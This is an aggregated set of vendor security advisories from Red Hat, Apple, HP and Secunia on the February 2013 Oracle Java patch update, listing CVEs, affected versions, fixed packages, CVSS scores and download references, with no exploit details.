859140 - CVE-2013-0440 OpenJDK: CPU consumption DoS via repeated SSL ClientHello packets (JSSE, 7192393)
860652 - CVE-2013-1475 OpenJDK: IIOP type reuse sandbox bypass (CORBA, 8000540, SE-2012-01 Issue 50)
906447 - CVE-2013-0431 OpenJDK: JMX Introspector missing package access check (JMX, 8000539, SE-2012-01 Issue 52)
906449 - CVE-2013-1489 Oracle JDK 7: bypass of the security level setting in browser plugin (Deployment, SE-2012-01 Issue 53)
906813 - CVE-2013-0424 OpenJDK: RMI CGIHandler XSS issue (RMI, 6563318)
906892 - CVE-2013-0435 OpenJDK: com.sun.xml.internal.* not restricted packages (JAX-WS, 7201068)
906894 - CVE-2013-1478 OpenJDK: image parser insufficient raster parameter checks (2D, 8001972)
906899 - CVE-2013-0442 OpenJDK: insufficient privilege checking issue (AWT, 7192977)
906900 - CVE-2013-0445 OpenJDK: insufficient privilege checking issue (AWT, 8001057)
906904 - CVE-2013-1480 OpenJDK: image parser insufficient raster parameter checks (AWT, 8002325)
906911 - CVE-2013-0450 OpenJDK: RequiredModelMBean missing access control context checks (JMX, 8000537)
906914 - CVE-2012-1541 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906916 - CVE-2013-0446 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906917 - CVE-2012-3342 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906918 - CVE-2013-0419 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906921 - CVE-2013-0423 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906923 - CVE-2013-0351 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906930 - CVE-2013-0430 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Install)
906932 - CVE-2013-0449 Oracle JDK: unspecified vulnerability fixed in 7u13 (Deployment)
906933 - CVE-2013-1473 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
906934 - CVE-2013-0448 Oracle JDK: unspecified vulnerability fixed in 7u13 (Libraries)
906935 - CVE-2013-0438 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Deployment)
907190 - CVE-2013-1479 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JavaFX)
907207 - CVE-2013-0428 OpenJDK: reflection API incorrect checks for proxy classes (Libraries, 7197546, SE-2012-01 Issue 29)
907218 - CVE-2013-0444 OpenJDK: MethodFinder insufficient checks for cached results (Beans, 7200493)
907219 - CVE-2013-0432 OpenJDK: insufficient clipboard access premission checks (AWT, 7186952)
907222 - CVE-2013-0437 Oracle JDK: unspecified vulnerability fixed in 7u13 (2D)
907223 - CVE-2012-3213 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (Scripting)
907226 - CVE-2013-0409 Oracle JDK: unspecified vulnerability fixed in 6u39 and 7u13 (JMX)
907340 - CVE-2013-0443 OpenJDK: insufficient Diffie-Hellman public key checks (JSSE, 7192392)
907344 - CVE-2013-0425 OpenJDK: logging insufficient access control checks (Libraries, 6664509)
907346 - CVE-2013-0426 OpenJDK: logging insufficient access control checks (Libraries, 6664528)
907453 - CVE-2013-0434 OpenJDK: loadPropertyFile missing restrictions (JAXP, 8001235)
907455 - CVE-2013-0427 OpenJDK: invalid threads subject to interrupts (Libraries, 6776941)
907456 - CVE-2013-0433 OpenJDK: InetSocketAddress serialization issue (Networking, 7201071)
907457 - CVE-2013-1476 OpenJDK: missing ValueHandlerImpl class constructor access restriction (CORBA, 8000631)
907458 - CVE-2013-0441 OpenJDK: missing serialization restriction (CORBA, 7201066)
907460 - CVE-2013-0429 OpenJDK: PresentationManager incorrectly shared (CORBA, 7141694)
6. Package List:
Red Hat Enterprise Linux Desktop Supplementary (v. 5):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.i386.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 5):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.i386.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.i386.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.1.el5_9.x86_64.rpm
Red Hat Enterprise Linux Desktop Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux HPC Node Supplementary (v. 6):
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Server Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
Red Hat Enterprise Linux Workstation Supplementary (v. 6):
i386:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.i686.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.i686.rpm
x86_64:
java-1.7.0-oracle-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-devel-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-javafx-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-jdbc-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-plugin-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
java-1.7.0-oracle-src-1.7.0.13-1jpp.3.el6_3.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2012-1541.html
https://www.redhat.com/security/data/cve/CVE-2012-3213.html
https://www.redhat.com/security/data/cve/CVE-2012-3342.html
https://www.redhat.com/security/data/cve/CVE-2013-0351.html
https://www.redhat.com/security/data/cve/CVE-2013-0409.html
https://www.redhat.com/security/data/cve/CVE-2013-0419.html
https://www.redhat.com/security/data/cve/CVE-2013-0423.html
https://www.redhat.com/security/data/cve/CVE-2013-0424.html
https://www.redhat.com/security/data/cve/CVE-2013-0425.html
https://www.redhat.com/security/data/cve/CVE-2013-0426.html
https://www.redhat.com/security/data/cve/CVE-2013-0427.html
https://www.redhat.com/security/data/cve/CVE-2013-0428.html
https://www.redhat.com/security/data/cve/CVE-2013-0429.html
https://www.redhat.com/security/data/cve/CVE-2013-0430.html
https://www.redhat.com/security/data/cve/CVE-2013-0431.html
https://www.redhat.com/security/data/cve/CVE-2013-0432.html
https://www.redhat.com/security/data/cve/CVE-2013-0433.html
https://www.redhat.com/security/data/cve/CVE-2013-0434.html
https://www.redhat.com/security/data/cve/CVE-2013-0435.html
https://www.redhat.com/security/data/cve/CVE-2013-0437.html
https://www.redhat.com/security/data/cve/CVE-2013-0438.html
https://www.redhat.com/security/data/cve/CVE-2013-0440.html
https://www.redhat.com/security/data/cve/CVE-2013-0441.html
https://www.redhat.com/security/data/cve/CVE-2013-0442.html
https://www.redhat.com/security/data/cve/CVE-2013-0443.html
https://www.redhat.com/security/data/cve/CVE-2013-0444.html
https://www.redhat.com/security/data/cve/CVE-2013-0445.html
https://www.redhat.com/security/data/cve/CVE-2013-0446.html
https://www.redhat.com/security/data/cve/CVE-2013-0448.html
https://www.redhat.com/security/data/cve/CVE-2013-0449.html
https://www.redhat.com/security/data/cve/CVE-2013-0450.html
https://www.redhat.com/security/data/cve/CVE-2013-1473.html
https://www.redhat.com/security/data/cve/CVE-2013-1475.html
https://www.redhat.com/security/data/cve/CVE-2013-1476.html
https://www.redhat.com/security/data/cve/CVE-2013-1478.html
https://www.redhat.com/security/data/cve/CVE-2013-1479.html
https://www.redhat.com/security/data/cve/CVE-2013-1480.html
https://www.redhat.com/security/data/cve/CVE-2013-1489.html
https://access.redhat.com/security/updates/classification/#critical
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2013 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFREE70XlSAg2UNWIIRAl0aAJ9geHwpDX2Kb2LdBP3WSQxnPNr97gCgmyRY
c2rbNUSIrrFwoG5d602o5QY=
=Kt+4
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201302-0132 | CVE-2013-0419 | Oracle Java contains multiple vulnerabilities |
CVSS V2: 7.6 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 through Update 11 and 6 through Update 38 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment, a different vulnerability than other CVEs listed in the February 2013 CPU. Java 7 Update 11, Java 6 Update 38, and earlier versions of Java contain vulnerabilities that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. This vulnerability February 2013 CPU This is a different vulnerability than the other vulnerabilities listed on the list.Information is obtained by a third party, information is altered, or service operation is interrupted. (DoS) An attack may be carried out.
The vulnerability can be exploited over multiple protocols. This issue affects the 'Deployment' sub-component.
This vulnerability affects the following supported versions:
7 Update 11 and prior, 6 Update 38 and prior, 5.0 Update 38 and prior
Note: This issue was previously discussed in BID 57670 (Oracle Java Runtime Environment Multiple Security Vulnerabilities) but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
APPLE-SA-2013-02-19-1 Java for OS X 2013-001 and Mac OS X v10.6
Update 13
Java for OS X 2013-001 and Mac OS X v10.6 Update 13 is now available
and addresses the following:
Java
Available for: OS X Lion v10.7 or later,
OS X Lion Server v10.7 or later, OS X Mountain Lion 10.8 or later
Impact: Multiple vulnerabilities in Java 1.6.0_37
Description: Multiple vulnerabilities existed in Java 1.6.0_37, the
most serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox. Visiting a web page
containing a maliciously crafted untrusted Java applet may lead to
arbitrary code execution with the privileges of the current user. For
Mac OS X v10.6 systems, these issues were addressed in Java for Mac
OS X v10.6 Update 13. Further information is available via the Java
website at http://www.oracle.com/technetwork/java/javase/
releasenotes-136954.html
CVE-ID
CVE-2012-3213
CVE-2012-3342
CVE-2013-0351
CVE-2013-0409
CVE-2013-0419
CVE-2013-0423
CVE-2013-0424
CVE-2013-0425
CVE-2013-0426
CVE-2013-0427
CVE-2013-0428
CVE-2013-0429
CVE-2013-0432
CVE-2013-0433
CVE-2013-0434
CVE-2013-0435
CVE-2013-0438
CVE-2013-0440
CVE-2013-0441
CVE-2013-0442
CVE-2013-0443
CVE-2013-0445
CVE-2013-0446
CVE-2013-0450
CVE-2013-1473
CVE-2013-1475
CVE-2013-1476
CVE-2013-1478
CVE-2013-1480
CVE-2013-1481
Java
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Impact: Multiple vulnerabilities in Java
Description: Multiple vulnerabilities existed in Java, the most
serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox. Visiting a web page
containing a maliciously crafted untrusted Java applet may lead to
arbitrary code execution with the privileges of the current user.
Further information is available via the Java website at http://www.o
racle.com/technetwork/java/javase/releasenotes-136954.html
CVE-ID
CVE-2013-1486
CVE-2013-1487
CVE-2013-1488
Malware removal
Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Description: This update runs a malware removal tool that will
remove the most common variants of malware. If malware is found, it
presents a dialog notifying the user that malware was removed. There
is no indication to the user if malware is not found.
Java for OS X 2013-001 and Java for Mac OS X 10.6 Update 13
may be obtained from the Software Update pane in System Preferences,
Mac App Store, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
For Mac OS X v10.6 systems
The download file is named: JavaForMacOSX10.6.Update13.dmg
Its SHA-1 digest is: 5327984bc0b300c237fe69cecf69513624f56b0e
For OS X Lion and Mountain Lion systems
The download file is named: JavaForOSX2013-001.dmg
Its SHA-1 digest is: 145d74354241cf2f567d2768bbd0a7185e7d308a
Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJRI/A/AAoJEPefwLHPlZEwDp4QAKz9nfo397KaudpFDey26bsb
GNR8HQ3Z5Ln0ArgwBcc2XabzIYXsjmY7nPdZgq1m0sWgFGWtfQ7qslRooUyNLOsB
WUddu+hQYvPn3CJOZsaPfTA2mfK6Qk9LeyqzUUkZrRNltHnIFMO7uXLEIdrFdnnx
exFMPjbIq+xM5UZgvd/2grtF4DaZHnbcK+t/tDwH09/hGRQ+l+3a/3FB2S1Av85c
FSuiieyrz2NNnDwFCj5NeSFQuK7hr52TiSOEPYI2eiTepyBHrUy03wAe8uwIzQII
RjkY3Nbc8AZt0Q6lq5TgsQbH+vrwVE07nty36uMKmE2vJXyOAIZjfrrwv9SetLwd
QnU5NYMbeHAHmSN5JQfuvDxEfL15/7Jafw2noJGotdrMzs6XQACFIHKqLORdwNkp
sltj3LwykpcyoCR8Dq7NPafqhp2wySaHX8DFSohcq1aa1w+SLDgPCZUAzknwokCL
f/hVQzP6hD0uHP/2jsLjh5g6TgHmCRdR+CKCs7QZaYAUketelRX9YOcgcXzqf5sy
EcbDvJ+rd3KsQ9gIByGwVhHD87NSZDJAyG0ROjMMS9w/7l7nhGxedzGzlyK3oNl/
VpewgZ8FpUrvY80HOPz5XyFmX+HQoSnJ8er6OI5AvHBPn+Z1yHDLS5zpLeDD/wO9
rmbzMJjZUnlCDXoLEVQ9
=qlVo
-----END PGP SIGNATURE-----
.
The updates can be downloaded from HP Software Support Online (SSO).
HP Product/Version
Platform/Component
Location
HP Service Manager 9.31.2004 p2
AIX Server
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_0041
HP Service Manager 9.31.2004 p2
HP Itanium Server
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00420
HP Service Manager 9.31.2004 p2
Linux Server
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00421
HP Service Manager 9.31.2004 p2
Solaris Server
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00422
HP Service Manager 9.31.2004 p2
Web Tier
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00424
HP Service Manager 9.31.2004 p2
Windows Client
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00425
HP Service Manager 9.31.2004 p2
KnowledgeManagement
http://support.openview.hp.com/selfsolve/document/FID/DOCUMENTUM_HPSM_00426
HP Service Manager 7.11.655 p21
AIX Server
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00482
HP Service Manager 7.11.655 p21
HP Itanium Server
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00483
HP Service Manager 7.11.655 p21
HP parisc Server
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00484
HP Service Manager 7.11.655 p21
Linux x86 Server
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00485
HP Service Manager 7.11.655 p21
Solaris Server
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00486
HP Service Manager 7.11.655 p21
Windows Server
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00487
HP Service Manager 7.11.655 p21
Web Tier
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00488
HP Service Manager 7.11.655 p21
Windows Client
http://support.openview.hp.com/selfsolve/document/LID/HPSM_00489
HP ServiceCenter 6.2.8.14
AIX Server
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00279
HP ServiceCenter 6.2.8.14
HP Itanium Server
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00280
HP ServiceCenter 6.2.8.14
HP parisc Server
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00281
HP ServiceCenter 6.2.8.14
Linux Server
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00282
HP ServiceCenter 6.2.8.14
Solaris Server
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00283
HP ServiceCenter 6.2.8.14
Windows Server
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00284
HP ServiceCenter 6.2.8.14
Web Tier
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00285
HP ServiceCenter 6.2.8.14
Windows Client
http://support.openview.hp.com/selfsolve/document/LID/HPSC_00286
HISTORY
Version:1 (rev.1) - 29 April 2013 Initial release
Version:2 (rev.2) - 30 October 2013 added HP Service Manager v7.11
Version:3 (rev.3) - 11 December 2013 added HP ServiceCenter v6.2.8
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released.
Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
----------------------------------------------------------------------
TITLE:
Oracle Java Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA52064
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/52064/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
RELEASE DATE:
2013-02-02
DISCUSS ADVISORY:
http://secunia.com/advisories/52064/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/52064/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52064
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Oracle Java, which can
be exploited by malicious local users to gain escalated privileges and
by malicious people to disclose certain sensitive information,
manipulate certain data, cause a DoS (Denial of Service), and
compromise a vulnerable system.
1) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
2) An unspecified error in the 2D component of the client and server
deployment can be exploited to potentially execute arbitrary code.
3) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
4) An unspecified error in the AWT component of the client deployment
can be exploited to potentially execute arbitrary code.
5) An unspecified error in the AWT component of the client and server
deployment can be exploited to potentially execute arbitrary code.
6) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
7) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
8) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
9) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
10) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
11) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
12) An unspecified error in the JMX component of the client
deployment can be exploited to potentially execute arbitrary code.
13) An unspecified error in the JavaFX component of the client
deployment can be exploited to potentially execute arbitrary code.
14) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
15) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
16) An unspecified error in the Libraries component of the client
deployment can be exploited to potentially execute arbitrary code.
17) An unspecified error in the Scripting component of the client
deployment can be exploited to potentially execute arbitrary code.
18) An unspecified error in the Sound component of the client
deployment can be exploited to potentially execute arbitrary code.
19) An unspecified error in the Beans component of the client
deployment can be exploited to potentially execute arbitrary code.
20) An unspecified error in the CORBA component of the client
deployment can be exploited to potentially execute arbitrary code.
21) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
22) An unspecified error in the Deployment component of the client
deployment can be exploited to potentially execute arbitrary code.
23) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose and manipulate certain data
and cause a DoS.
24) An unspecified error in the Install component of the client
deployment can be exploited by a local user to gain escalated
privileges.
25) An unspecified error in the AWT component of the client
deployment can be exploited to disclose and manipulate certain data.
26) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
27) An unspecified error in the Deployment component of the client
deployment can be exploited to manipulate certain data.
28) An unspecified error in the JAX-WS component of the client
deployment can be exploited to disclose certain data.
29) An unspecified error in the JAXP component of the client
deployment can be exploited to disclose certain data.
30) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
31) An unspecified error in the JMX component of the client
deployment can be exploited to disclose certain data.
32) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
33) An unspecified error in the Libraries component of the client
deployment can be exploited to manipulate certain data.
34) An unspecified error in the Networking component of the client
deployment can be exploited to manipulate certain data.
35) An unspecified error in the RMI component of the client
deployment can be exploited to manipulate certain data.
36) An unspecified error in the JSSE component of the server
deployment can be exploited via SSL/TLS to cause a DoS.
37) An unspecified error in the Deployment component of the client
deployment can be exploited to disclose certain data.
38) An unspecified error in the JSSE component of the client
deployment can be exploited via SSL/TLS to disclose and manipulate
certain data.
The vulnerabilities are reported in the following products:
* JDK and JRE 7 Update 11 and earlier.
* JDK and JRE 6 Update 38 and earlier.
* JDK and JRE 5.0 Update 38 and earlier.
* SDK and JRE 1.4.2_40 and earlier.
SOLUTION:
Apply updates.
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY:
One of the vulnerabilities is reported as a 0-day. It is currently
unclear who reported the remaining vulnerabilities as the Oracle Jave
SE Critical Patch Update for February 2013 only provides a bundled
list of credits. This section will be updated when/if the original
reporter provides more information.
ORIGINAL ADVISORY:
http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html
http://www.oracle.com/technetwork/topics/security/javacpufeb2013verbose-1841196.html
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Note: the current version of the following document is available here:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c03725347
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03725347
Version: 1
HPSBUX02864 SSRT101156 rev.1 - HP-UX Running Java, Remote Unauthorized
Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.
Release Date: 2013-04-03
Last Updated: 2013-04-03
Potential Security Impact: Remote unauthorized access, disclosure of
information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in Java Runtime
Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These
vulnerabilities could allow remote unauthorized access, disclosure of
information, and other exploits.
References: CVE-2012-1541, CVE-2012-3213, CVE-2012-3342, CVE-2013-0351,
CVE-2013-0409, CVE-2013-0419, CVE-2013-0423, CVE-2013-0424, CVE-2013-0425,
CVE-2013-0426, CVE-2013-0427, CVE-2013-0428, CVE-2013-0429, CVE-2013-0432,
CVE-2013-0433, CVE-2013-0434, CVE-2013-0435, CVE-2013-0438, CVE-2013-0440,
CVE-2013-0441, CVE-2013-0442, CVE-2013-0443, CVE-2013-0445, CVE-2013-0446,
CVE-2013-0450, CVE-2013-0809, CVE-2013-1473, CVE-2013-1475, CVE-2013-1476,
CVE-2013-1478, CVE-2013-1480, CVE-2013-1481, CVE-2013-1493
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.17 and
earlier
BACKGROUND
CVSS 2.0 Base Metrics
===========================================================
Reference Base Vector Base Score
CVE-2012-1541 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3213 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2012-3342 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0351 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5
CVE-2013-0409 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
